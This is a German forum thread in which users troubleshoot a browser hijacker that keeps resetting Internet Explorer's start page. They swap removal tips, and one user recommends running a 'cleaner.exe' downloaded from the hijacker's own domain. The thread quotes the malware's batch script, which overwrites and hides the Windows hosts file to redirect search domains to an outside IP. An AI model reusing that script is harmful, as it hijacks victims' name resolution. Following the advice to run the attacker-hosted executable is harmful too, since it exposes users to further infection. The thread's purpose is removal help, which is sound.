Startseite erscheint automatisch

Die Datei würde ich aus der Registry komplett entfernen, die hat dort nichts verloren. Wird sich wohl ein Trojaner/Wurm bei Dir eingenistet haben.
Testweise kannst Du Dein Javascript im IE mal deaktivieren.

Gelöst: Startseite erscheint automatisch

Hi,

habe das Problem gefunden, bei dem man die Start-Adresse aus IExplorer nicht weg kriegt (nach jedem Neustart trägt sich eine eigene Adresse immer wieder neu ein) :

C:\WINDOWS\SVCHOST.EXE in Windows Ordner löschen (19.968 Bytes groß) nicht die anderen SVCHOST.EXE in den anderen Ordnern löschen. Und mit msconfig aus Systemstart löschen.
Mein Virenscanner AVG 6.0 & Ad-aware 6.0 haben es nicht gefunden.

Viel Spaß...

Markus

Zuletzt bearbeitet:
Und zu welchem Problem soll das jetzt die Lösung sein? Bei mir ist es so eingestellt, das er automatisch auf die Startseite von FB geht, und eine SVCHOST.EXE habe ich nicht im Windowsordner.
Was möchtest Du uns also mitteilen, wenn es sich auf eine Frage bezieht, poste die Antwort in den Thread, wo es hingehört. Ansonsten weiß ich damit nichts anzufangen.

Antwort

Hallo,

es ging um folgendews Problem:

"Hallo Leute, seit einiger Zeit erscheint bei mir immerwieder eine bestimmte Satrseite in meinem Browser ohne das ich diese einstellung so gewählt habe. Ich kann diese Seite in den Browser Einstellungen auch löschen, sie erscheint aber immer wieder automatisch. Wer kann mir helfen, mir einen Tip verraten wie ich die Seite löschen kann ohne das sie immer wieder erscheint? Vielen Dank im voraus."

Ich halte diese Beitrag für sehr wichtig, weil bei mir kein Virenscanner diese Datei als eine Virus entlarft hat.

Gruß
Markus

Themen wurden zusammengeführt. :)

mfg Simon

Schön zusammengemüllt und keiner sieht mehr durch!!!! :headshot: Dann kannst den auch gleich ganz zu machen.

Hi leute,
ich hatte das Problem bis gerade eben auch.

Bei mir war es auch eine Seite mit einer ID die abwechselt auf wetsearch.ws oder coolsearch.ws geführt hat

Ich hab gerade unten auf der seite was entdeckt: http://wetsearch.ws/cleaner.exe

probierts mal damit aus.

mFg SoniX

Toll, ich hab das selbe Problem. Allerdings trau ich mich nicht ne Datei auszuführen die cleaner.exe heißt. Falls es schon andere ausprobiert haben, wäre es schön zu wissen ob es denn funktioniert. Also plz post :rolleyes:.

ich habs gepostet weils bei mir gefunzt hat ;)

edit: äääähm... ja hol dir ne 2te meinung

Zuletzt bearbeitet:
Das dachte ich mir schon, nur zwei Meinungen sind besser als eine. Du verstehst?

EDIT: Ja ist ja gut, habs jetzt doch einfach ausprobiert und es funzt wirklich :p.

EDIT die 2te: Kann das hier einer uppen plz? Ich hab das Ding wieder gelöscht gehabt, und nu hab ich wieder son Mist am Hals, und die Seite wo es das vorher gab, ist nicht zu erreichen.

Zuletzt bearbeitet von einem Moderator:
Re: Ich habs gefunden !

André schrieb:
Beim NoteBook meines Ex-Schwiegervaters ;)
kam immer wieder die Startseite hp.htm auf, abgelegt unter c:\windows.

Habe dann folgende batch-Datei gefunden, die dies beinhaltete.
War Tricky dies zu finden !!!

@echo off
if exist c:\windows\hp.htm goto act
copy c:\windows\odbs.log c:\windows\hp.htm > nul
goto act
:act
regedit /s srch.reg > nul
attrib -h -s -r c:\windows\system32\drivers\etc\hosts > nul
echo 206.161.200.105 auto.search.msn.com > c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 sitefinder.verisign.com >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 sitefinder-idn.verisign.com >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 http://www.your.com/ >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 your.com >> c:\windows\system32\drivers\etc\hosts
echo #To disable your family filter just delete all the following lines: >> c:\windows\system32\drivers\etc\hosts
attrib +h +s +r c:\windows\system32\drivers\etc\hosts > nul
exit

Genau das Problem hatte ich auch!
Danke, dank deinen Tipps hab ich sie gefunden (und ein kleines Tool gebastelt, auf die Schnelle, wer es haben will: PM an mich :D )

Greets - SK

Zurück
Oben